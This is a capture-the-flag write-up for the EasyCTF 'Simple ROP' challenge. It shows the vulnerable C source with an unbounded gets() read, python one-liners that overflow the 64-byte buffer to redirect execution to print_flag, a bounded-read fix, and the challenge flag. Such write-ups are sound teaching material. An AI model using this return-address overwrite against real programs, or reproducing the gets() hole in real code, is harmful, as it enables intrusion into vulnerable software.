# Simple ROP - 120 Points
Read flag.txt
[Source](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/simple-rop/simple-rop.c)
[Binary](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/simple-rop/simple-rop?raw=true)
### Solution
###### Writeup by VoidMercy from phsst
We were given a binary and its source code:
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* getegid(), setresgid() */

void print_flag();
void what_did_you_say();

int main(int argc, char* argv[])
{
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    what_did_you_say();
    return 0;
}

/* Never called by the program itself; the target of the overflow. */
void print_flag()
{
    system("cat flag.txt");
}

void what_did_you_say()
{
    char buff[64];
    gets(buff);   /* unbounded read: input longer than 64 bytes overwrites the stack frame */
    printf("You said: %s\n", buff);
}
```
As the problem name suggests, this problem is solved with ROP. `print_flag()` is never called by the program, so we have to redirect execution to it ourselves. First we get the function's address with:
>objdump -d simple-rop | grep "print_flag"

We find the address of `print_flag` to be `0x804851a`.
Then we have to find the number of characters we must write before we overwrite the saved return address and gain control of `eip`. After that padding we append the address of `print_flag()` in little-endian order (least significant byte first, i.e. the hex string reversed in two-digit chunks), and generate the input with python so that the non-printable bytes can be emitted:
```sh
# Python 2 print statement; the address bytes are non-printable, so they are built in python
python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop   # no segfault: not enough characters
python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop   # got the flag! 76 is a pretty common size for an array of 64 chars
```
The 76 bytes cover the 64-byte buffer, the compiler's stack padding, and the saved `ebp`; the next 4 bytes are the saved return address.
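For contrast, here is the fix a developer would apply to `what_did_you_say()`: replace `gets()` with a bounded `fgets()` read. This is an added educational example, not code from the challenge or the writeup; `read_line_bounded`, `kept_length` and the sentinel value are constructed for the demonstration and stand in for the saved return address of the real frame.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads at most size-1 bytes, always NUL-terminates,
   and drains the rest of an over-long line so it cannot bleed into the next read.
   Returns the number of bytes kept, or -1 on EOF/error. */
static int read_line_bounded(char *buf, size_t size, FILE *in) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL) return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';
    } else {
        /* line longer than the buffer: discard the remainder */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n') ;
    }
    return (int)len;
}

/* Mirrors the layout of what_did_you_say(): a 64-byte buffer followed by a sentinel
   (constructed marker) in the position the saved return address would occupy.
   Returns the bytes kept if the sentinel survived, -2 if it was clobbered. */
int kept_length(const char *input) {
    struct { char buff[64]; unsigned int sentinel; } frame;
    frame.sentinel = 0xdeadbeefu;
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL) return -1;
    int n = read_line_bounded(frame.buff, sizeof frame.buff, in);
    fclose(in);
    if (frame.sentinel != 0xdeadbeefu) return -2;
    return n;
}

int main(void) {
    char line[64];
    int n = read_line_bounded(line, sizeof line, stdin);
    if (n >= 0) printf("You said: %s (%d bytes kept)\n", line, n);
    return 0;
}
```

Feeding the same 80-byte input that overflows `gets()` now yields a 63-byte truncated string and an intact saved return address.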
## Flag
>easyctf{r0p_7o_v1ct0ry}